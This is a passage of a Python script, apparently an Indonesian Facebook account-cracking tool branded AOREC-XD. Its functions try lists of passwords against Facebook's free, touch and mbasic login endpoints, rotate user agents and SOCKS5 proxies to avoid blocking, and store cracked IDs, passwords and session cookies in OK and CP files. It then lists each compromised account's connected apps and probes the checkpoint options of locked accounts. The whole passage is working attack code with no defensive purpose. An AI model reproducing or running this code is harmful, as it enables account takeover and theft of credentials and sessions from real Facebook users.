print(f'\rLOGIN CHECKPOINT\n├──> {K}{idf}|{pw}{N}\n└──> {ua}{M}')
open('CP/'+cpc,'a').write(idf+' • '+pw+'\n')
akun.append(idf+' • '+pw)
cp+=1
break
elif "c_user" in ses.cookies.get_dict().keys():
ok+=1
coki=po.cookies.get_dict()
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print(f'\rLOGIN BERHASIL\n├──> {H}{idf}|{pw}\n└──> {kuki}\n└──> {ua}{M}')
open('OK/'+okc,'a').write(idf+'|'+pw+'|'+ua+'\n')
cek_apk(session,coki)
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
loop+=1
#------------------[ METHODE-MBASIC-2 ]-------------------#
def crackfree(idf,pwv):
global loop,ok,cp
sys.stdout.write(f"\r🔥 {P}[{asu}Mbasic{P}]{P}[{b}{loop}{P}/{p}{len(id)}{P}]—{P}[{H}{ok}{P}]—{P}[{k}{cp}{x}]—[{m}{'{:.0%}'.format(loop/float(len(id)))}{P}] "),
sys.stdout.flush()
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
for pw in pwv:
try:
ses.headers.update({'Host': 'free.facebook.com','cache-control': 'max-age=0','sec-ch-ua-mobile': '?1','upgrade-insecure-requests': '1','user-agent': ua2,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
p = ses.get('https://free.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&refsrc=deprecated&_rdr')
dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p.text)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p.text)).group(1),"uid":idf,"next":"https://free.facebook.com/login/save-device/","flow":"login_no_pin","pass":pw,}
koki = (";").join([ "%s=%s" % (key, value) for key, value in p.cookies.get_dict().items() ])
koki+=' m_pixel_ratio=2.625; wd=412x756'
heade={'Host': 'free.facebook.com','cache-control': 'max-age=0','sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98"','sec-ch-ua-mobile': '?1','sec-ch-ua-platform': '"Android"','upgrade-insecure-requests': '1','origin': 'https://free.facebook.com','content-type': 'application/x-www-form-urlencoded','user-agent': ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','x-requested-with': 'XMLHttpRequest','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://free.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&refsrc=deprecated&_rdr','accept-encoding': 'gzip, deflate, br','accept-language': 'ms-MY,ms;q=0.9,en-US;q=0.8,en;q=0.7','connection': 'close'}
po = ses.post('https://free.facebook.com/login/device-based/validate-password/?shbl=0',data=dataa,cookies={'cookie': koki},headers=heade,allow_redirects=False,proxies=proxs)
if "checkpoint" in po.cookies.get_dict().keys():
print(f'\r{K}LOGIN CHECKPOINT: {idf}|{pw}{N}')
os.popen('play-audio .cp.mp3')
open('CP/'+cpc,'a').write(idf+'|'+pw+'\n')
akun.append(idf+'|'+pw)
cp+=1
break
elif "c_user" in ses.cookies.get_dict().keys():
ok+=1
coki=po.cookies.get_dict()
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print(f'\r{H}LOGIN SUCCESS: {idf}|{pw}|{kuki}{N}')
os.popen('play-audio .ok.mp3')
open('OK/'+okc,'a').write(idf+'|'+pw+'\n')
cek_apk(session,coki)
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
loop+=1
#---------------------[ METHODE-TOUCH-3 ]---------------------#
def cracktouch(idf,pwv):
global loop,ok,cp
bi = random.choice([u,k,kk,b,h,hh])
pers = loop*100/len(id2)
fff = '%'
nip=random.choice(prox)
proxs= {'http': 'socks5://'+nip}
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
sys.stdout.write('\r%s ☬ %s/%s ☬ OK:%s ☬ CP:%s ☬ %s%s%s ☬'%(bi,loop,len(id2),ok,cp,int(pers),str(fff),x));sys.stdout.flush()
for pw in pwv:
try:
ses.headers.update({'Host': 'touch.facebook.com','cache-control': 'max-age=0','sec-ch-ua-mobile': '?1','upgrade-insecure-requests': '1','user-agent': ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
p = ses.get('https://touch.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&refsrc=deprecated&_rdr')
dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p.text)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p.text)).group(1),"uid":idf,"next":"https://touch.facebook.com/login/save-device/","flow":"login_no_pin","pass":pw,}
koki = (";").join([ "%s=%s" % (key, value) for key, value in p.cookies.get_dict().items() ])
koki+=' m_pixel_ratio=2.625; wd=412x756'
heade={'Host': 'touch.facebook.com','cache-control': 'max-age=0','sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98"','sec-ch-ua-mobile': '?1','sec-ch-ua-platform': '"Android"','upgrade-insecure-requests': '1','origin': 'https://touch.facebook.com','content-type': 'application/x-www-form-urlencoded','user-agent': ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','x-requested-with': 'XMLHttpRequest','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://touch.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&refsrc=deprecated&_rdr','accept-encoding': 'gzip, deflate, br','accept-language': 'fr_FR,fr;q=0.9,en-US;q=0.8,en;q=0.7','connection': 'close'}
po = ses.post('https://touch.facebook.com/login/device-based/validate-password/?shbl=0',data=dataa,cookies={'cookie': koki},headers=heade,allow_redirects=False,proxies=proxs)
if "checkpoint" in po.cookies.get_dict().keys():
if 'ya' in oprek:
akun.append(idf+'|'+pw)
ceker(idf,pw)
elif 'ya' in princp:
print('\n')
statuscp = f'[•] ID : {idf} [•] PASSWORD : {pw}'
statuscp1 = nel(statuscp, style='red')
cetak(nel(statuscp1, title='AOREC-XD CP'))
open('/sdcard/4MBF-DATA/CP/'+cpc,'a').write(idf+'|'+pw+'\n')
akun.append(idf+'|'+pw)
cp+=1
else:continue
break
elif "c_user" in ses.cookies.get_dict().keys():
headapp={"user-agent":"SupportsFresco=1 Dalvik/2.1.0 (Linux; U; Android 6.0.1; SM-J210F Build/MMB29Q) Source/1 [FBAN/EMA;UNITY_PACKAGE/342;FBBV/107586706;FBAV/172.0.0.8.182;FBDV/SM-J210F;FBLC/id_ID;FBOP/20]"}
if 'no' in taplikasi:
coki=po.cookies.get_dict()
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
open('/sdcard/4MBF-DATA/OK/'+okc,'a').write(idf+'|'+pw+'|'+kuki+'\n')
print('\n')
statusok = f'[•] ID : {idf}\n[•] PASSWORD : {pw}\n[•] COOKIES : {kuki}'
statusok1 = nel(statusok, style='green')
cetak(nel(statusok1, title='AOREC-XD OK'))
ok+=1
break
elif 'ya' in taplikasi:
coki=po.cookies.get_dict()
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
open('/sdcard/4MBF-DATA/OK/'+okc,'a').write(idf+'|'+pw+'|'+kuki+'\n')
user=idf
infoakun = ""
session = requests.Session()
cek2 = session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies=coki,headers=headapp).text
cek =session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies=coki,headers=headapp).text
infoakun += (f"\n[bold cyan][•] LIST ACTIVE APPLICATIONS :[/bold cyan] \n")
apkaktif=re.findall('</i><div class=".*?"><span class=".*?">(.*?)</span><div></div><div class=".*?">(.*?)</div></div>',str(cek))
nok=1
for muncul in apkaktif:
infoakun+= (f"[bold cyan][{nok}] {muncul[0]} {muncul[1]}[/bold cyan]\n")
nok+=1
hit=0
infoakun += (f"\n[bold yellow][•] LIST EXPIRED APPLICATIONS :[/bold yellow]\n")
apkexp=re.findall('</i><div class=".*?"><span class=".*?">(.*?)</span><div></div><div class=".*?">(.*?)</div></div>',str(cek2))
hit=0
for muncul in apkexp:
hit+=1
infoakun += (f"[bold yellow][{hit}] {muncul[0]} {muncul[1]}[/bold yellow]\n")
print('\n')
statusok = f'[bold green][•] ID : {idf}\n[•] PASSWORD : {pw}\n[•] COOKIES : {kuki}[/bold green]\n{infoakun}'
statusok1 = nel(statusok, style='green')
cetak(nel(statusok1, title='[bold green]AOREC-XD OK[/bold green]'))
ok+=1
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
loop+=1
#----------------------[ METHODE-MTOUCH+MOBILE-4 ]-----------------#
def crackmbasic(idf,pwv):
global loop,ok,cp
bi = random.choice([u,k,kk,b,h,hh])
pers = loop*100/len(id2)
fff = '%'
nip=random.choice(prox)
proxs= {'http': 'socks5://'+nip}
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
sys.stdout.write('\r%s ☬ %s/%s ☬ OK:%s ☬ CP:%s ☬ %s%s%s ☬'%(bi,loop,len(id2),ok,cp,int(pers),str(fff),x));sys.stdout.flush()
for pw in pwv:
try:
ses.headers.update({'Host': 'mbasic.facebook.com','cache-control': 'max-age=0','sec-ch-ua-mobile': '?1','upgrade-insecure-requests': '1','user-agent': ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
p = ses.get('https://mbasic.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&refsrc=deprecated&_rdr')
dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p.text)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p.text)).group(1),"uid":idf,"next":"https://mbasic.facebook.com/login/save-device/","flow":"login_no_pin","pass":pw,}
koki = (";").join([ "%s=%s" % (key, value) for key, value in p.cookies.get_dict().items() ])
koki+=' m_pixel_ratio=2.625; wd=412x756'
heade={'Host': 'mbasic.facebook.com','cache-control': 'max-age=0','sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98"','sec-ch-ua-mobile': '?1','sec-ch-ua-platform': '"Android"','upgrade-insecure-requests': '1','origin': 'https://mbasic.facebook.com','content-type': 'application/x-www-form-urlencoded','user-agent': ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','x-requested-with': 'XMLHttpRequest','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://mbasic.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&refsrc=deprecated&_rdr','accept-encoding': 'gzip, deflate, br','accept-language': 'fr_FR,fr;q=0.9,en-US;q=0.8,en;q=0.7','connection': 'close'}
po = ses.post('https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0',data=dataa,cookies={'cookie': koki},headers=heade,allow_redirects=False,proxies=proxs)
if "checkpoint" in po.cookies.get_dict().keys():
if 'ya' in oprek:
akun.append(idf+'|'+pw)
ceker(idf,pw)
elif 'ya' in princp:
print('\n')
statuscp = f'[•] ID : {idf} [•] PASSWORD : {pw}'
statuscp1 = nel(statuscp, style='red')
cetak(nel(statuscp1, title='AOREC-XD CP'))
open('/sdcard/4MBF-DATA/CP/'+cpc,'a').write(idf+'|'+pw+'\n')
akun.append(idf+'|'+pw)
cp+=1
else:continue
break
elif "c_user" in ses.cookies.get_dict().keys():
headapp={"user-agent":"SupportsFresco=1 Dalvik/2.1.0 (Linux; U; Android 6.0.1; SM-J210F Build/MMB29Q) Source/1 [FBAN/EMA;UNITY_PACKAGE/342;FBBV/107586706;FBAV/172.0.0.8.182;FBDV/SM-J210F;FBLC/id_ID;FBOP/20]"}
if 'no' in taplikasi:
coki=po.cookies.get_dict()
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
open('/sdcard/4MBF-DATA/OK/'+okc,'a').write(idf+'|'+pw+'|'+kuki+'\n')
print('\n')
statusok = f'[•] ID : {idf}\n[•] PASSWORD : {pw}\n[•] COOKIES : {kuki}'
statusok1 = nel(statusok, style='green')
cetak(nel(statusok1, title='OK'))
ok+=1
break
elif 'ya' in taplikasi:
coki=po.cookies.get_dict()
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
open('/sdcard/4MBF-DATA/OK/'+okc,'a').write(idf+'|'+pw+'|'+kuki+'\n')
user=idf
infoakun = ""
session = requests.Session()
cek2 = session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies=coki,headers=headapp).text
cek =session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies=coki,headers=headapp).text
infoakun += (f"\n[bold cyan][•] LIST ACTIVE APPLICATIONS :[/bold cyan] \n")
apkaktif=re.findall('</i><div class=".*?"><span class=".*?">(.*?)</span><div></div><div class=".*?">(.*?)</div></div>',str(cek))
nok=1
for muncul in apkaktif:
infoakun+= (f"[bold cyan][{nok}] {muncul[0]} {muncul[1]}[/bold cyan]\n")
nok+=1
hit=0
infoakun += (f"\n[bold yellow][•] LIST EXPIRED APPLICATIONS :[/bold yellow]\n")
apkexp=re.findall('</i><div class=".*?"><span class=".*?">(.*?)</span><div></div><div class=".*?">(.*?)</div></div>',str(cek2))
hit=0
for muncul in apkexp:
hit+=1
infoakun += (f"[bold yellow][{hit}] {muncul[0]} {muncul[1]}[/bold yellow]\n")
print('\n')
statusok = f'[bold green][•] ID : {idf}\n[•] PASSWORD : {pw}\n[•] COOKIES : {kuki}[/bold green]\n{infoakun}'
statusok1 = nel(statusok, style='green')
cetak(nel(statusok1, title='[bold green]AOREC-XD OK[/bold green]'))
ok+=1
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
loop+=1
#--------------------[ CHECK-OPSI-CHEKPOINT ]-------------------#
def ceker(idf,pw):
global cp
ua = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.128 Safari/537.36 FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.services;FBDV/EVR-L29;FBSV/10;FBLR/0;FBBK/1;FBCA/arm64-v8a:;]'
head = {"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": "https://mbasic.facebook.com","content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}
ses = requests.Session()
try:
hi = ses.get('https://mbasic.facebook.com')
ho = sop(ses.post('https://mbasic.facebook.com/login.php', data={'email':idf,'pass':pw,'login':'submit'}, headers=head, allow_redirects=True).text,'html.parser')
jo = ho.find('form')
data = {}
lion = ['nh','jazoest','fb_dtsg','submit[Continue]','checkpoint_data']
for anj in jo('input'):
if anj.get('name') in lion:
data.update({anj.get('name'):anj.get('value')})
kent = sop(ses.post('https://mbasic.facebook.com'+str(jo['action']), data=data, headers=head).text,'html.parser')
print('\r%s++++ %s|%s ----> CP %s'%(b,idf,pw,x))
open('CP/'+cpc,'a').write(idf+'|'+pw+'\n')
cp+=1
opsi = kent.find_all('option')
if len(opsi)==0:
print('\r%s---> Tap Yes / A2F (Cek Login Di Lite/Mbasic%s)'%(hh,x))
else:
for opsii in opsi:
print('\r%s---> %s%s'%(kk,opsii.text,x))
except Exception as c:
print('\r%s++++ %s|%s ----> CP %s'%(b,idf,pw,x))
print('\r%s---> Tidak Dapat Mengecek Opsi (Cek Login Di Lite/Mbasic)%s'%(u,x))
open('CP/'+cpc,'a').write(idf+'|'+pw+'\n')
cp+=1
#--------------------------[ CHECK-OPSI-CHEKPOINT-2 ]----------------#
def cek_opsi():
c = len(akun)
hu = 'Terdapat %s Akun Untuk Dicek\nSebelum Mulai, Mode Pesawat/Ubah Kartu Sim Terlebih Dahulu'%(c)
cetak(nel(hu, title='CEK OPSI'))
input(x+'['+h+'•'+x+'] Mulai')
cek = '# PROSES CEK OPSI DIMULAI'
sol().print(mark(cek, style='green'))
love = 0
for kes in akun:
try:
try:
id,pw = kes.split('|')[0],kes.split('|')[1]
except IndexError:
time.sleep(2)
print('\r%s++++ %s ----> Error %s'%(b,kes,x))
print('\r%s---> Pemisah Tidak Didukung Untuk Program Ini%s'%(u,x))
continue
bi = random.choice([u,k,kk,b,h,hh])
print('\r%s---> %s/%s ---> { %s }%s'%(bi,love,len(akun),id,x), end=' ');sys.stdout.flush()
ua = 'Mozilla/5.0 (Linux; Android 11; TECNO KD8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4755.101 Mobile Safari/537.36'
ses = requests.Session()
header = {"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": "https://mbasic.facebook.com","content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"}
hi = ses.get('https://mbasic.facebook.com')
ho = sop(ses.post('https://mbasic.facebook.com/login.php', data={'email':id,'pass':pw,'login':'submit'}, headers=header, allow_redirects=True).text,'html.parser')
if "checkpoint" in ses.cookies.get_dict().keys():
try:
jo = ho.find('form')
data = {}
lion = ['nh','jazoest','fb_dtsg','submit[Continue]','checkpoint_data']
for anj in jo('input'):
if anj.get('name') in lion:
data.update({anj.get('name'):anj.get('value')})
kent = sop(ses.post('https://mbasic.facebook.com'+str(jo['action']), data=data, headers=header).text,'html.parser')
print('\r%s++++ %s|%s ----> CP %s'%(b,id,pw,x))
opsi = kent.find_all('option')
if len(opsi)==0:
print('\r%s---> Tap Yes / A2F (Cek Login Di Lite/Mbasic%s)'%(hh,x))
else:
for opsii in opsi:
print('\r%s---> %s%s'%(kk,opsii.text,x))
except:
print('\r%s++++ %s|%s ----> CP %s'%(b,id,pw,x))
print('\r%s---> Tidak Dapat Mengecek Opsi%s'%(u,x))
elif "c_user" in ses.cookies.get_dict().keys():
print('\r%s++++ %s|%s ----> OK %s'%(h,id,pw,x))
else:
print('\r%s++++ %s|%s ----> SALAH %s'%(x,id,pw,x))
love+=1
except requests.exceptions.ConnectionError:
print('')
li = '# KONEKSI INTERNET BERMASALAH, PERIKSA & COBA LAGI'
sol().print(mark(li, style='red'))
exit()
dah = '# DONE'
sol().print(mark(dah, style='green'))
exit()
#----------------------[ CEK-APLIKASI ]---------------------#
def cek_apk(session,cookie):
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":cookie}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f"\n {N}[{M}!{N}] opshh tidak ada aplikasi aktif di akun ini.")
else:
for i in range(len(game)):
print(" %s%s. %s%s"%(H,i+1,game[i].replace("Ditambahkan pada"," Ditambahkan pada"),N))
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":cookie}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f"\n {N}[{M}!{N}] opshh tidak ada aplikasi kadaluarsa di akun ini.")
else:
for i in range(len(game)):
print(" %s%s. %s%s"%(K,i+1,game[i].replace("Kedaluwarsa"," Kedaluwarsa"),N))
#-----------------------[ SYSTEM-CONTROL ]--------------------#
if __name__=='__main__':
try:os.system('git pull')
except:pass
try:os.mkdir('OK')
except:pass
try:os.mkdir('CP')
except:pass
try:os.mkdir('DUMP')
except:pass
try:os.system('touch .prox.txt')
except:pass
login()
#>>>>> THANKS TO THIS HERE <<<<<<<#
#>>>>> IKFAR__IFC <<<<<#